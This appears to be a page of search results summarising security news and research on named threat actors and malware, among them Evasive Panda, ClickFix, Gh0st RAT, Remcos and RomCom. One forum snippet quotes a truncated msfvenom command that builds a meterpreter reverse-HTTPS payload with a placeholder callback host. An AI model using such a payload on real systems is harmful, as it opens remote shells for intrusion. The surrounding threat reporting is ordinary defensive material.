China-linked Evasive Panda used DNS poisoning to deliver the MgBot backdoor in targeted espionage attacks from 2022 to 2024.
The ClickFix campaign disguises malware as legitimate Windows updates, using steganography to hide shellcode in PNG files and bypass security detection systems.
Threat actors are using a twist on the ClickFix attack model, in this case hiding the malicious code they want victims to download in a convincing – but fake – Windows Update screen, complete with ...
The threat actor known as Dragon Breath has been observed making use of a multi-stage loader codenamed RONINGLOADER to deliver a modified variant of a remote access trojan called Gh0st RAT. The ...
The threat actor behind Operation ForumTroll used the same toolset typically employed in Dante spyware attacks. The exploitation of the first Chrome zero-day of 2025 is linked to tools used in attacks ...
Remcos RAT gets a stealthy upgrade as attackers ditch old office exploits for a fileless PowerShell loader that runs entirely in memory. Threat actors have been spotted using a PowerShell-based ...
In this blogpost, ESET researchers provide an analysis of Spellbinder, a lateral movement tool for performing adversary-in-the-middle attacks, used by the China-aligned threat actor that we have named ...
How come there are no user-agent strings embedded in the shellcode when using this command: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=443 ...
ESET researchers discovered a previously unknown vulnerability in Mozilla products, exploited in the wild by Russia-aligned group RomCom. This is at least the second time that RomCom has been caught ...
DEF CON 31 – Bramwell Brizendine’s, Jacob Hince’s, Austin Babcock’s, Max Kersten’s ‘Game-Changing Advances In Windows Shellcode Analysis’ by Marc Handelman on November 22, 2023 ...
Some results have been hidden because they may be inaccessible to you
Show inaccessible results
Feedback